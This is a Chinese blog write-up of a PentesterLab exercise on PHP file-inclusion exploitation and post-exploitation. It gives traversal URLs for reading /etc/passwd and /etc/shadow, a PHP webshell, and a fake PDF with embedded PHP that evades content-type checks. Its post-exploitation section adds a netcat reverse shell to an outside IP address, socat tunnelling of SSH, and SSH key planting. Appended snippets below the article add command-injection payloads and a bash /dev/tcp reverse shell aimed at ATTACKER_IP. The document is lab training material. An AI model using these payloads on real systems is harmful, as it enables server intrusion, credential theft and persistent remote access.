[Pentester Lab]PHP Include And Post Exploitation

最新推荐文章于 2024-11-06 06:52:57 发布
翻译 最新推荐文章于 2024-11-06 06:52:57 发布 · 1.1k 阅读 · 0
文章标签:

#Web #文件上传

本文介绍了一种利用PHP文件包含漏洞的手动检测方法,并详细解释了如何通过此漏洞执行代码,进一步获取系统权限的过程。

本文是Pentester Lab上的PHP Include And Post Exploitation实验。实验中使用了靶机(提供的ISO),以及一台云主机(用于实现反向shell)。

一、简介

大致步骤如下:
1. 指纹识别
2. 检测和利用PHP文件包含漏洞
3. 后期利用

二、指纹识别

  1. telnet, nc, …
  2. Nikto

三、检测并利用PHP文件包含漏洞

3.1 PHP文件包含漏洞简介

  1. 典型的PHP文件包含漏洞
<?php
    include("header.php");
    include($_GET["page"]);
?>
  1. 有两种PHP文件包含漏洞
    • 本地文件包含漏洞
    • 远程文件包含漏洞

3.2 检测PHP文件包含漏洞

  1. 最简单的测试方法是使用会产生错误的路径。

  2. 先尝试一个不存在的文件:

    • http://phpinclude/index.php?page=pentesterlab123randomvalue

    • 产生以下错误信息

      Warning: include(pentesterlab123randomvalue.php): failed to open stream: No such file or directory in /var/www/index.php on line 28

Warning: include(): Failed opening 'pentesterlab123randomvalue.php' for inclusion (include_path='.:') in /var/www/index.php on line 28

    • 其中Failed opening 'pentesterlab123randomvalue.php' for inclusion泄露了重要的信息:Server的PHP代码会添加.php后缀。

  3. 可以使用NULL比特(%00)来摆脱.php后缀。
  4. Web Server的用户很可能没有访问/etc/shadow的权限,所以如果访问/etc/shadow就会产生错误。使用下面的URL:

    http://phpinclude/index.php?page=../../../../../etc/shadow%00

    可以得到错误信息:

    Warning: include(/etc/shadow): failed to open stream: Permission denied in /var/www/index.php on line 28 Warning: include(): Failed opening '../../../../../etc/shadow' for inclusion (include_path='.:') in /var/www/index.php on line 28
  5. 4中的方法访问/etc/passwd,可以得到该文件内容:

    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash

  6. 使用page[]=login会产生下面的错误:

    Warning: include(Array.php): failed to open stream: No such file or directory in /var/www/index.php on line 28 
Warning: include(): Failed opening 'Array.php' for inclusion (include_path='.:') in /var/www/index.php on line 28

  7. 使用classes/../login./loginlogin匹配同名的文件。

    • classes/../login如果classes库不存在,Windows和Linux/Unix的处理是不同的。
  8. 测试远程文件包含需要满足两个条件:
    • PHP设置允许远程文件包含
    • Web Server可以访问远程Server
  9. 使用http://vulnerable/index.php?page=http://www.google.com/?测试远程文件包含,发现PHP设置禁止远程文件包含。

四、利用PHP本地文件包含漏洞

同SQL注入(盲注和非盲注)一样,可以先尝试远程文件包含漏洞,如果不行,再尝试本地文件包含漏洞。

  1. 远程文件包含漏洞的利用
    • 需要设置一个远程的Web Server来提供PHP代码,PHP代码可以是简单的webshell:
      php
      <?php
      system($_GET["cmd"]);
      ?>

  2. 本地文件包含漏洞的利用

    • 有很多种方法,但共同点是:
      • 将PHP代码放入系统的文件中
      • include代码
    • 可以使用的方法如下:
      • 将PHP代码注入到日志中:通过Web服务器访问指定的URL(该路径包含PHP代码),并include服务器日志。
      • 将PHP代码注入到邮件:发送一封邮件,然后include这封邮件(/var/spool/mail)。
      • 上传并include一个文件:例如,可以上传一张图片,将PHP代码放在图片的comment section(这样在文件尺寸被修改时,代码不会被修改)。
      • 使用其他服务将PHP代码上传:FTP,NFS等。

        不是万不得已,不要注入日志。如果第一次尝试的时候,没有使用正确的PHP语法(正确的PHP代码和正确的HTTP编码),那么就必须等待日志滚动,才能进行下一次尝试。

    • 为了测试上传功能,需要确认:
      • 哪些后缀名可以上传
        • 将PDF重命名为php文件
      • 什么类型的内容可以上传
        • 将txt文件改为pdf后缀
    • 如果Server既检查后缀名,又检查文件类型,那么我们需要一个真正的PDF文档,其中包含有PHP代码。有两种方法:
      • 任意的PDF文档,加入PHP payload
        • 某些字符在include时不能被很好地支持
      • 使用一个类似于PDF的PHP文件,可以通过内容类型的检查
        • 这种方法较为可靠

    • 验证伪造的PHP文件是否能通过文件内容类型检验

      • 使用head命令查看PDF文件的第一行
      • PHP的mime_content_type函数,使用文件第一行%PDF-1.4来确定文件类型是否为PDF。
      • 制作伪造的PDF文件 
        %PDF-1.4
<?php
    system($_GET["cmd"]);
php>

    • 上传伪造的php文件lfi.pdf

    • 命令执行:http://vulnerable/index.php?page=uploads/lfi.pdf%00&cmd=uname
      • 文件名的后面要加上NULL字节%00
      • cmd参数是将要执行的命令

四、Post-Exploitation

4.1 Introduction to Post-Exploitation

Webshell的每一条命令具有独立的上下文,所以难以使用cd ..的命令。为了绕过这种限制,需要得到一个**真正的**shell。

4.2 Shell与反向Shell

  1. 两种远程执行命令的方法:
    • Shell
    • 反向Shell
  2. 由于防火墙更多的是过滤入站流量,所以在目标主机绑定Shell不太可行,所以反向Shell是更好的选择。
  3. 使用反向shell,双方主机都要安装有netcat。
  4. 过程
    • 本机绑定nc到某端口:nc -lvp 2233
    • 目标主机使用webshell连接到本机
http://phpinclude/index.php?page=uploads/lfi.pdf%00&cmd=/bin/nc%20123.206.7.107%202233%20-e%20/bin/bash

4.3 使用socat进行TCP重定向

下一步的目标是有一个真正的shell(例如,支持Ctrl+C)。

  • 攻击者本地生成SSH密钥对
ssh-keygen -P "" -f phpinclude

  • 攻击者上传SSH公钥

    • 使用80端口的反向shell上传公钥。先获取用户名id和主目录:
      上传SSH公钥

  • 攻击者使用本地443端口接收来自目标主机的流量,并转发到本地2222端口

attacker $ sudo nohup socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr >> ~/socat.log 2>&1 &
  • 使用靶机的反向shell,连接到攻击者的443端口,并把流量转发到靶机本地的22端口。
phpinclude $ while true; do socat TCP4:XXX.XXX.XXX.XXX:443 TCP4:127.0.0.1:22 ; done
  • 使用ssh登录到靶机~
    ssh登录靶机

4.4 DNS隧道

【留待补充】

五、总结

这个练习展示了如何手工检测和利用一个PHP文件包含漏洞,进而执行代码。执行代码后,可以进一步获取更多信息,从而得到更多的系统访问权。

练习中的Web Server可以展示错误信息,这是一种理想情况。想要提高难度的话,可以更改PHP设置:在PHP设置(/etc/php5/apache2/php.ini)中禁用display_errors选项,并重启Web Server(sudo /etc/init.d/apache2 restart)。

Meterpreter Post-Exploitation分析
爱测未来团队博客
08-09 2427
Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。
VulnHub靶场系列-Pentester Lab: Electronic CodeBook(ECB)
rlenew的博客
02-23 557
主机:192.168.136.133 靶机:192.168.136.150 ECB(Electronic Code Book)/电码本模式 就是将数据依照8个字节一段进行DES加密或解密得到一段8个字节的密文或者明文,最后一段不足8个字节,依照需求补足8个字节进行计算,之后依照顺序将计算所得的数据连在一起就可以。各段数据之间互不影响。 特点: 1.简单。有利于并行计算。误差不会被传送。 2.不能隐...
PentesterLab-PHP Include And Post Exploitation
weixin_30627341的博客
09-17 151
一、打开页面,看到这么个页面,按照惯例随手点一点 二、Login处显然是一个后台登录页面,但前提是的有账号密码,看了下Submit这个页面,发现url中有个page参数 三、nikto跑一下这个页面。里面有这么一条信息很有意思 + /index.php?page=../../../../../../../../../../etc/passwd: PHP include error m...
PHP 一一 文件包含、GET POST、头像上传功能
Guizy
01-04 798
三、PHP中的文件包含 1、为什么需要文件包含 2、文件包含的步骤 在实际项目开发中,我们通常把项目分为两个公用部分(顶部+底部),然后使用文件包含放入到我们的页面中。 文件包含的基本语法:include与require 3、include与require的区别(重点) include与require对于文件的包含其效果都是一样的。但是两者对于错误的处理不同: ① in
OSCP Learning Notes - Post Exploitation(1)
weixin_30645617的博客
07-29 323
Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l payloads All the payload type in Metasploit are showing as below: Framework Paylo...
Metasploit之Post Exploitation
公众号shadow sock7
06-17 1864
参考: https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/autoroute这个很重要啊! The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to
xss-and-mysql file 靶场通关教程
nocap14551的博客
10-29 1074
xss 配合sql注入get shell
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1663
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
Road to Pentester - INE Lab - BurpSuite
0pr
05-24 283
Lab Intro A local police department has hired you to pentest their website. They had a new website created by a web development company and they want to make sure that everything is secure and in order. In this lab you will practice with Burp Suite, config
web_for_pentester.pdf
04-02
Web for pentester是一款由安全研究者Louis Nyffenegger开发的渗透测试平台,旨在帮助用户掌握Web漏洞检测的实战技能。从给出的部分内容来看,这份材料涉及了Web渗透测试的基础知识,Web安全模型,常见的Web安全风险...
ATTCK-PenTester-Book-master.zip
09-08
ATT&CK 中文手册 一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) 八、lateral-movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取)
开源项目推荐:Post Exploitation Wiki
gitblog_00212的博客
11-06 380
开源项目推荐:Post Exploitation Wiki 项目基础介绍和主要编程语言 Post Exploitation Wiki 是一个专注于后渗透测试的维基项目,旨在为安全研究人员和渗透测试人员提供一个集中的资源库。该项目主要使用HTML和Markdown语言编写,通过MDwiki框架将内容整合在一个单一的HTML文件中,便于用户在本地或在线环境中访问。 项目核心功能 Post Exploi...
探索 Post-Exploitation 的世界 - mubix/post-exploitation
gitblog_00098的博客
03-16 439
探索 Post-Exploitation 的世界 - mubix/post-exploitation 是一个实用的工具集合,为渗透测试者、红队成员和安全研究人员提供了一个强大的平台,用于进行后渗透利用和持续访问操作。它包含了多个模块,可以帮助你在攻击链的不同阶段执行关键任务。 项目用途 mubix/post-exploitation 可以用于: 收集信息:收集目标系统上的各种信息,包括但不限于操...
如何使用Metasploit进行后渗透攻击?
m0_74131821的博客
05-29 1485
后渗透攻击(PostExploitation)是整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节
搭建学习环境(十一)——Web_For_Pentester通关记录
baynk的博客
04-09 3540
0x00 Pentesterlab 又发现了一靶场,大多数都是相同的,但是也有之前一直没有学习的ldap注入,而且安装时用的不是开发者提供的整机靶场,自己把源码拿出来了,搭建在了自己的服务器上,然后还原的ldap环境及修改部分代码成功还原实验场景,对ldap也有了更深的理解,虽然花了不少时间,linux搞openladp感觉好麻烦,特别是导数据,不过还是很值得的,学了不少东西。 此靶场准备用两篇博...
phppost,php中几种post方法
weixin_42306002的博客
03-09 914
如何从一个php文件向另一个地址post数据,不用表单和隐藏的变量现介绍三中方法方法1:function posttohost($url, $data) {$url = parse_url($url);if (!$url) return "couldn''t parse url";if (!isset($url[''port''])) { $url[''port''] = ""; }if (!is...
php文件路径加密,php include的妙用,实现路径加密
weixin_33603111的博客
03-18 544
php include的妙用,实现路径加密发布于 2014-09-27 08:00:01 | 87 次阅读 | 评论: 0 | 来源: 网友投递PHP开源脚本语言PHP(外文名: Hypertext Preprocessor,中文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,入门门槛较低,易于学习,使用广泛,主要适用于Web开发领域。PHP的文件后缀名...
php
12-02 292
[root@localhost stuff]# ./coolStage 1: Filling mem with bad pdestructor ... DONEStage 2: Triggering mem_limit now ...
web for pentester example 9
最新发布
12-25
<think>我们正在处理一个关于Web for Pentester的请求,具体是Example 9。根据用户的问题,他想要查找面向渗透测试人员的Web示例9。Web for Pentester是一个渗透测试的学习环境,包含多个示例漏洞。 由于我们无法直接访问外部资源,但根据常见的Web for Pentester结构,Example 9通常涉及某种类型的漏洞。在Web for Pentester中,示例通常按类别划分,如SQL注入、XSS、命令注入等。每个示例有多个练习。 根据记忆,Web for Pentester的Example 9可能是以下之一(由于版本不同可能有所变化): - 在Web for Pentester 1中,Example 9可能是XSS或命令注入等。 - 但更常见的是,在Web for Pentester的官方文档中,Example 9被标记为“Command Injection”(命令注入)的第三个例子。 然而,为了准确起见,我们可以假设用户指的是PentesterLabWeb for Pentester,并且Example 9是命令注入的第三个练习(因为命令注入部分通常有多个例子,比如1到3)。 因此,我们可以这样回答: Example 9 of Web for Pentester is typically the third exercise in the Command Injection section. In this example, the goal is to exploit a command injection vulnerability by injecting additional commands into a vulnerable parameter. The vulnerability often appears in a web application that executes system commands based on user input. For instance, the application might have a page that pings an IP address provided by the user. The user input is then passed to a system command without proper sanitization, allowing an attacker to append additional commands. An example of the vulnerable code (in PHP) might look like: ```php <?php system("ping -c 2 ".$_GET['ip']); ?> ``` To exploit this, an attacker could use a payload like: ``` 127.0.0.1; cat /etc/passwd ``` This would cause the server to execute: ``` ping -c 2 127.0.0.1; cat /etc/passwd ``` Thus, the contents of the `/etc/passwd` file would be displayed. However, note that the exact example might vary. It's recommended to set up the Web for Pentester environment and access the example directly. §§相关问题§§ 1. What is command injection and how to prevent it? 2. How does Web for Pentester help in learning penetration testing? 3. What are other common vulnerabilities in Web for Pentester? </think> 根据 Web for Pentester 的渗透测试实践环境,**Example 9** 通常涉及 **命令注入(Command Injection)** 漏洞的高级利用。以下是详细分析: --- ### 漏洞场景 假设存在一个网络服务,提供 IP 地址连通性测试功能: ```php // 示例 PHP 代码(后端逻辑) $ip = $_GET['ip']; system("ping -c 4 " . $ip); // 未过滤用户输入 ``` 用户通过 URL 参数 `?ip=xxx` 提交 IP 地址,系统直接拼接并执行 `ping` 命令。 --- ### 渗透测试方法 #### 步骤 1:基础注入 尝试闭合命令并执行额外操作: ```http http://target/page.php?ip=127.0.0.1; id ``` 系统实际执行: ```bash ping -c 4 127.0.0.1; id ``` 结果返回当前用户信息(如 `uid=33(www-data)`)。 #### 步骤 2:绕过过滤(如空格被禁用) 使用 `{cat,/etc/passwd}` 替代空格: ```http http://target/page.php?ip=8.8.8.8;{cat,/etc/passwd} ``` #### 步骤 3:获取反向 Shell 注入反向 Shell 命令: ```http http://target/page.php?ip=1.1.1.1; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 ``` 需在攻击机监听:`nc -lvnp 4444`。 --- ### 修复建议 1. **输入验证**:仅允许数字和点(如正则 `\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}`) 2. **使用安全 API**: ```php shell_exec("ping -c 4 " . escapeshellarg($ip)); ``` 3. **最小权限**:以低权限用户运行 Web 服务[^1]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值